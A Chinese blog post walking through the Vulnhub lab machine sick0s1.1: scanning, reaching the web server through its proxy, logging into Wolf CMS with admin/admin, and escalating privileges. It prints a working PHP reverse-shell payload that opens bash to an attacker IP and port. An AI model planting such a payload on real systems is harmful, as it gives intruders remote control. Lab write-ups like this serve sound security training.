sick0s1.1 靶机实战

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量424 收藏 1
点赞数 12
分类专栏: Vulnhub靶机实战 文章标签: 网络安全 web安全 web 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/139533558
版权

sick0s1.1

信息收集

nmap存活及端口:

nmap服务扫描:

web

80和8080都没有开放,,无法访问,gobuster等工具也跑不了,访问一下3128试试

根据端口服务扫描也能得知这是个http的代理服务器,,我们添加代理后再次访问80和8080,,

80可以成功访问:

扫描后台:

访问robots.txt 发现有个cms的目录,,


 

搜到后台路径:

弱口令 admin/admin登录:

在 homepage 中添加php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.4/2233 0>&1'"); ?>

kali开启监听

web再次访问首页 即可获得shell

发现数据库帐号密码:

ssh登录:

提权:

flag:

kitha.
关注
专栏目录
CTF之Kioptrix Level 1.1 靶机渗透(万能密码 命令注入)
afei001
04-16 997
练习环境     攻击机:kali     靶机:Kioptrix: Level 1.1 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3419
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
靶机-SickOs 1.2 Walkthrough
banacyo14206的博客
08-22 295
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 296
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
VulnHub-sick0s1.1-靶机渗透学习
嗯嗯呐的博客
12-06 744
靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并在其上获得管理/根目录特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshell提权利用shellshock获得shell总结 信息收集 Nmap 扫描靶机端口 nmap扫描靶机
VulnHub-sick0s1.2-靶机渗透学习
嗯嗯呐的博客
12-08 914
靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 靶机难度:中级(CTF) 靶机描述:这是SickOs的后续系列中的第二篇,并且与先前的发行版无关,挑战范围是在系统上获得最高特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshellPHP一句话木马获得shell利用MSF获得shell提权手工提权MSF提权总结 信息收集 nmap扫描确定靶机地址 nmap扫描端口 -sS 半端口扫描 -sV 扫描出对应程序的版
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机操作练习,earth 靶机实战练习
09-08
网络安全和渗透测试的学习过程中,靶机操作是一个重要的实践环节。在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行...
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 224
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。
Vulhub之sick0s篇
weixin_56306210的博客
08-21 156
Vulhub之sick0s篇
VulnHub-Sick0s1.2
江左盟的博客
08-29 1万+
目录 简介 信息收集 漏洞发现 漏洞利用 ​权限提升 ​总结 简介 该靶机Sick0s系列的第二个靶机,总体来说不难,提权那里需要花点时间,毕竟linpeas脚本没有将计划任务标红,总之我个人尝试了很久内核提权,浪费了大量时间,而且不知道是web服务太不稳定还是我用的ESXI太旧了,web服务挂掉的次数太多了。通过PUT方法在test目录下写入webshell获取服务器权限,然后利用chkrootkit 0.49本地提权漏洞提升至root权限。 信息收集 ...
网络安全sick0s 靶场实践之getshell
HBohan的博客
04-12 2414
主机发现 arp-scan -l 目标ip为192.168.1.12 端口扫描 nmap -sV -sC -T4 192.168.1.12 -p- -sV:查看端口对应服务 -sC:使用默认脚本测试 -T4:快速测试 -p-:全端口扫描 扫描完成,看到3128端口,尝试访问一下 在这里卡了很久,根据他的左下角版本信息搜了一下漏洞,还真有一个对应版本的绕过访问限制,不过试了很久都没成功,这里压根没想他的功能,实在过不去了,看了一下他的writeup才知道原来这个端口是http-proxy代理,
vulnHub-sick0s1.1学习 两种解法
m0_50431798的博客
06-07 1426
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。查看passwd表可以看到有/bin/bash的用户有root,sickos。
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4567
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1638
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2194
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
sick0s靶场搭建
09-08
你好!对于搭建SickOS靶场,你可以按照以下步骤进行操作: 1. 首先,你需要一个虚拟化平台,比如VirtualBox或VMware Workstation,用于创建和管理虚拟机。 2. 下载SickOS的ISO文件,可以在官方网站上找到。SickOS是一个专门设计的漏洞靶场,用于学习和实践渗透测试技术。 3. 在虚拟化平台中创建一个新的虚拟机,并将SickOS的ISO文件作为虚拟机的光驱。 4. 启动虚拟机,并按照提示进行安装。你可以选择默认设置或自定义设置,根据你的需求进行配置。 5. 完成安装后,启动虚拟机,并确保网络连接正常。 6. 在主机上下载和安装Kali Linux或其他渗透测试工具。这些工具可用于攻击和测试SickOS中的漏洞。 7. 确保主机和虚拟机在同一网络中,并配置网络设置以便它们可以相互通信。 8. 确保虚拟机的防火墙设置允许从主机访问。 9. 现在,你可以开始使用Kali Linux或其他工具对SickOS进行渗透测试了。尝试利用其中的漏洞来获取系统权限或执行其他攻击。 请注意,渗透测试和攻击活动可能涉及法律和道德问题。在进行这些活动之前,请确保你有合法的授权,并且只在合法的环境中进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值